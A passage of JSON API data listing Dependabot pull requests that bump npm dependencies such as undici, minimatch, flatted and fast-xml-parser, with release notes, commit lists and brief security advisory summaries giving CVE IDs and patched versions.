href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.2.9 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.2.9...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.1.2 to 3.1.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.1.2...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `undici` from 5.28.5 to 6.24.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodejs/undici/releases\"\u003eundici's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev6.24.1\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nodejs/undici/compare/v6.24.0...v6.24.1\"\u003ehttps://github.com/nodejs/undici/compare/v6.24.0...v6.24.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev6.24.0\u003c/h2\u003e\n\u003ch1\u003eUndici v6.24.0 Security Release Notes (LTS)\u003c/h1\u003e\n\u003cp\u003eThis release backports fixes for security vulnerabilities affecting the v6 line.\u003c/p\u003e\n\u003ch2\u003eUpgrade guidance\u003c/h2\u003e\n\u003cp\u003eAll users on v6 should upgrade to \u003cstrong\u003ev6.24.0\u003c/strong\u003e or later.\u003c/p\u003e\n\u003ch2\u003eFixed advisories\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm\"\u003eGHSA-2mjp-6q6p-2qxm\u003c/a\u003e / CVE-2026-1525 (Medium)\u003cbr /\u003e\nInconsistent interpretation of HTTP requests (request/response smuggling class issue).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj\"\u003eGHSA-f269-vfmq-vjvj\u003c/a\u003e / CVE-2026-1528 (High)\u003cbr /\u003e\nMalicious WebSocket 64-bit frame length handling could crash the client.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq\"\u003eGHSA-4992-7rv2-5pvq\u003c/a\u003e / CVE-2026-1527 (Medium)\u003cbr /\u003e\nCRLF injection via the \u003ccode\u003eupgrade\u003c/code\u003e option.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8\"\u003eGHSA-v9p9-hfj2-hcw8\u003c/a\u003e / CVE-2026-2229 (High)\u003cbr /\u003e\nUnhandled exception from invalid \u003ccode\u003eserver_max_window_bits\u003c/code\u003e in WebSocket permessage-deflate negotiation.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q\"\u003eGHSA-vrm6-8vpv-qv8q\u003c/a\u003e / CVE-2026-1526 (High)\u003cbr /\u003e\nUnbounded memory consumption in WebSocket permessage-deflate decompression.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNot applicable to v6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h\"\u003eGHSA-phc3-fgpg-7m6h\u003c/a\u003e / CVE-2026-2581 affects \u003ccode\u003e\u0026gt;= 7.17.0 \u0026lt; 7.24.0\u003c/code\u003e only.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eAffected and patched ranges (v6)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2026-1525: affected \u003ccode\u003e\u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCVE-2026-1528: affected \u003ccode\u003e\u0026gt;= 6.0.0 \u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCVE-2026-1527: affected \u003ccode\u003e\u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCVE-2026-2229: affected \u003ccode\u003e\u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCVE-2026-1526: affected \u003ccode\u003e\u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eReferences\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eGitHub Security Advisories: \u003ca href=\"https://github.com/nodejs/undici/security/advisories\"\u003ehttps://github.com/nodejs/undici/security/advisories\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-1525: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-1525\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-1525\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-1528: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-1528\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-1528\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-1527: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-1527\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-1527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-2229: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-2229\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-2229\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-1526: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-1526\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-1526\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/c0cf656ef5e66f7372a7e57d08c6cbdd5b127e82\"\u003e\u003ccode\u003ec0cf656\u003c/code\u003e\u003c/a\u003e Bumped v6.24.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/f5a9f0ccbe958e7d0cfd7b63a9a8d195378ac6f6\"\u003e\u003ccode\u003ef5a9f0c\u003c/code\u003e\u003c/a\u003e Fix v6 release workflow branch targeting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/af2cb8fe01320f189394bef193c2d5b441fcfe6f\"\u003e\u003ccode\u003eaf2cb8f\u003c/code\u003e\u003c/a\u003e wqremove maxDecompressedMessageSize (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/4891\"\u003e#4891\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/8873c947271faf1ebc455bdc6158ecbc022ecfa9\"\u003e\u003ccode\u003e8873c94\u003c/code\u003e\u003c/a\u003e Bumped v6.24.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/411bd01a42e7917009bbf686f7628b99d67bbce9\"\u003e\u003ccode\u003e411bd01\u003c/code\u003e\u003c/a\u003e test(websocket): use node:assert for Node 18 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/844bf59699d778944f78a24ae819c0e8f295766e\"\u003e\u003ccode\u003e844bf59\u003c/code\u003e\u003c/a\u003e test: fix http2 lint regressions in backport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/a444e4f13e8958b4e1ac42bc0d53ace7fba0a9c1\"\u003e\u003ccode\u003ea444e4f\u003c/code\u003e\u003c/a\u003e test: stabilize h2 and tls-cert-leak under current test runner\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/dc032a1050d5489b8ce9b4c22aafba98a942f87b\"\u003e\u003ccode\u003edc032a1\u003c/code\u003e\u003c/a\u003e fix: h2 CI (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/4395\"\u003e#4395\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/4cd3f4b3a2ef910ba728c47ae78294d956410450\"\u003e\u003ccode\u003e4cd3f4b\u003c/code\u003e\u003c/a\u003e test: increase bitness in \u003ccode\u003etest/fixtures/*.pem\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/3659\"\u003e#3659\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/7df6442194b7a54e9ac734335e6e0a56a9bc6666\"\u003e\u003ccode\u003e7df6442\u003c/code\u003e\u003c/a\u003e fix: adapt websocket frame-limit handling for v6 parser\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.5...v6.24.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for undici since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Sin-Estres-dev/setup-node/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Sin-Estres-dev/setup-node/pull/6","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sin-Estres-dev%2Fsetup-node/issues/6","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/6/packages"},{"uuid":"4091765545","node_id":"PR_kwDOJkwVw87LYKfw","number":10,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 34 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-03-19T21:55:18.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-17T23:32:07.000Z","updated_at":"2026-03-19T21:55:20.000Z","time_to_close":166991,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":34,"packages":[{"name":"fast-xml-parser","old_version":"4.2.2","new_version":"5.5.6","repository_url":"https://github.com/NaturalIntelligence/fast-xml-parser"},{"name":"glob","old_version":"10.2.3","new_version":"10.5.0","repository_url":"https://github.com/isaacs/node-glob"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"jsonpath","old_version":"1.1.1","new_version":"1.3.0","repository_url":"https://github.com/dchester/jsonpath"},{"name":"path-to-regexp","old_version":"6.2.1","new_version":"6.3.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"path-to-regexp","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"express","old_version":"4.18.2","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"form-data","old_version":"4.0.0","new_version":"4.0.4","repository_url":"https://github.com/form-data/form-data"},{"name":"gatsby","old_version":"4.23.1","new_version":"4.25.9","repository_url":"https://github.com/gatsbyjs/gatsby"},{"name":"@babel/runtime-corejs3","old_version":"7.13.9","new_version":"7.29.2","repository_url":"https://github.com/babel/babel"},{"name":"@babel/traverse","old_version":"7.21.5","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.17.0","new_version":"11.4.4-cjs.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"brace-expansion","old_version":"1.1.8","new_version":"1.1.12","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"follow-redirects","old_version":"1.15.2","new_version":"1.15.11","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"socket.io-parser","old_version":"3.3.3","new_version":"3.3.5","repository_url":"https://github.com/socketio/socket.io"},{"name":"get-func-name","old_version":"2.0.0","new_version":"2.0.2","repository_url":"https://github.com/chaijs/get-func-name"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"jws","old_version":"3.2.2","new_version":"3.2.3","repository_url":"https://github.com/brianloveswords/node-jws"},{"name":"lodash","old_version":"4.17.21","new_version":"4.17.23","repository_url":"https://github.com/lodash/lodash"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"postcss","old_version":"8.3.11","new_version":"8.5.8","repository_url":"https://github.com/postcss/postcss"},{"name":"sharp","old_version":"0.30.7","new_version":"0.32.6","repository_url":"https://github.com/lovell/sharp"},{"name":"svgo","old_version":"2.8.0","new_version":"2.8.2","repository_url":"https://github.com/svg/svgo"},{"name":"word-wrap","old_version":"1.2.3","new_version":"1.2.5","repository_url":"https://github.com/jonschlinkert/word-wrap"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) | `4.2.2` | `5.5.6` |\n| [glob](https://github.com/isaacs/node-glob) | `10.2.3` | `10.5.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [jsonpath](https://github.com/dchester/jsonpath) | `1.1.1` | `1.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `6.2.1` | `6.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `1.8.0` | `1.9.0` |\n| [express](https://github.com/expressjs/express) | `4.18.2` | `4.22.1` |\n| [form-data](https://github.com/form-data/form-data) | `4.0.0` | `4.0.4` |\n| [gatsby](https://github.com/gatsbyjs/gatsby) | `4.23.1` | `4.25.9` |\n| [@babel/runtime-corejs3](https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3) | `7.13.9` | `7.29.2` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.21.5` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `11.4.4-cjs.2` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.8` | `1.1.12` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.2` | `1.15.11` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `3.3.3` | `3.3.5` |\n| [get-func-name](https://github.com/chaijs/get-func-name) | `2.0.0` | `2.0.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [jws](https://github.com/brianloveswords/node-jws) | `3.2.2` | `3.2.3` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.17.23` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [postcss](https://github.com/postcss/postcss) | `8.3.11` | `8.5.8` |\n| [sharp](https://github.com/lovell/sharp) | `0.30.7` | `0.32.6` |\n| [svgo](https://github.com/svg/svgo) | `2.8.0` | `2.8.2` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 1 update in the /.github/actions/close-bot directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `fast-xml-parser` from 4.2.2 to 5.5.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/releases\"\u003efast-xml-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003efix entity expansion and incorrect replacement and performance\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003esupport onDangerousProperty\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.5\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eupdate dependecies to fix typings\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eintegrate path-expression-matcher\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003esupport path-expression-matcher\u003c/li\u003e\n\u003cli\u003efix: stopNode should not be parsed\u003c/li\u003e\n\u003cli\u003eperformance improvement for stopNode checking\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eSeparate Builder\u003c/h2\u003e\n\u003cp\u003eXML Builder was the part of \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-builder\"\u003efast-xml-parser\u003c/a\u003e for years. But considering that any bug in builder may false-alarm the users who are only using parser and vice-versa, we have decided to split it into a separate package.\u003c/p\u003e\n\u003ch2\u003eMigration\u003c/h2\u003e\n\u003cp\u003eTo migrate to fast-xml-builder;\u003c/p\u003e\n\u003cp\u003eFrom\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { XMLBuilder } from \u0026quot;fast-xml-parser\u0026quot;;\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport  XMLBuilder  from \u0026quot;fast-xml-builder\u0026quot;;\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eXMLBuilder will be removed from current package in any next major version of this library. So better to migrate.\u003c/p\u003e\n\u003ch2\u003esupport strictReservedNames\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.9...v5.3.9\"\u003ehttps://github.com/NaturalIntelligence/fast-xml-parser/compare/v5.3.9...v5.3.9\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ehandle non-array input for XML builder \u0026amp;\u0026amp; support maxNestedTags\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003esupport 